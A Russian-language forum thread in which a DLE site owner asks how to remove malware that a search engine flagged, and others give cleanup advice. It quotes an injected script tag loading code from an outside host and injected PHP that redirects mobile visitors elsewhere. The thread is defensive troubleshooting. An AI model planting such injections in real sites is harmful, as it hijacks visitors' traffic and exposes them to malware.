Вирус в dle сайте

Question

Вирус в dle сайте

Здравствуйте. Недавно заметил что Яндекс нашел в Dle сайте вирус. Порылся в исходном коде, нашел подозрительную строку в

<head>
<script type="text/javascript" src="http://up.bot.nu/go/260"></script>
</head>

Что это может быть за вирус, может кто сталкивался с таким, в каких файлах стоит искать? Спасибо.

0

Ответы на пост (18) Написать ответ

Быстрая регистрация для ответа Войти

Answer 1

у меня на WP постоянно такое появляется, я уже не знаю что делать (у меня как попандер предлагающий обновить абоде ридер.)

Answer 2

Да, сам думаю удалить эту строку. Но не знаю, надо разобраться откуда она появляеться.

Answer 3

worldos

16

12.05.2013 21:20

Скорее всего у вас шелл на сайте, могу помочь его найти

0

Answer 4

Эта строчка выводится тегом {headers} в main.tpl, {headers} изменять нужно в /engine/engine.php в самом низу.

Answer 5

За частую бывает,если шаблон взят с паблика он в любом случаи напичкан рекламой!
А если стоит нуль от M.I.D то воопще лучше сразу сайт удалить,я как то раз поковырялся в нем у меня чуть челесть не отпала,он как дуршлак напичкан!

Answer 6

напичкан чем? нулы от мид тим самые надежные, за 3 года работы, ни одного "косяка". прежде, чем обвинять, подумайте, сможете ли доказать...
в общем пруф в студию.
dan95, дело пишет...

Answer 7

74ivan74

472

12.05.2013 21:39

Вот, лечитесь

0

Answer 8

Вообщем в engine.php множество стороннего кода, но раньше не было.

Answer 9

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}$active = FALSE;
$newsmodule = FALSE;
$disable_index = FALSE;
Кто может сказать, что делать с этим кодом, удалить?

Answer 10

74ivan74

472

12.05.2013 21:44

удалить, трафик сливается

0

Answer 11

74ivan74

472

12.05.2013 21:45

config.php проверьте и index.php

0

Answer 12

74ivan74

472

12.05.2013 21:45

Вы пользуетесь стандартное, dle проверкой? попробуйте!

0

Answer 13

david90

1

12.05.2013 21:46

Спасибо 74ivan74

0

Answer 14

Антивирус Dle обнаружил папку /upgrade/ и файлы внутри нее. Может удалить эту папку?

Answer 15

удалить конечно... она необходима для обновления версии (это когда обновляешься до актуальной версии движка, заливаешь ее)

Answer 16

у меня тоже уж 2 года как дле стоит от мид. первый косяк был месяца два назад, тоже яша писал, что есть вирус. я не нашла. яша тоже повторно не нашел. а вот потом стала перевозить сайты и нашла. прям в конфиге было все прописано, с телефонов, айфонов и прочего шло перенаправление. но вот с моего смарта ни разу не было его. лично я выставила права 644 на конфиг и закрыла регу. потом искала информацию и нашла, что нынче можно так подосрать (пардон) через загрузку аватара. больше ходов не нашла. да и закрыли уже в новых версиях эту дыру.

Answer 17

Donatsavkin

228

12.05.2013 23:00

код нужно удалять...

0

Answer 18

Стоит нулл от мид? Лезим в файлы engine.php ищем ссылку на 8дле . ру дальше ползем в show.full.php ищем тот же самый адрес, далее идем feedback.php ищем ссылку на невтемплеатес . ру ,по мимо этой ссылки там имеется еще парочка левых,удаляюсь с темы... ps - про шаблоны вообще молчу, описал малость!

Вирус в dle сайте

Похожие посты

Анализ сайта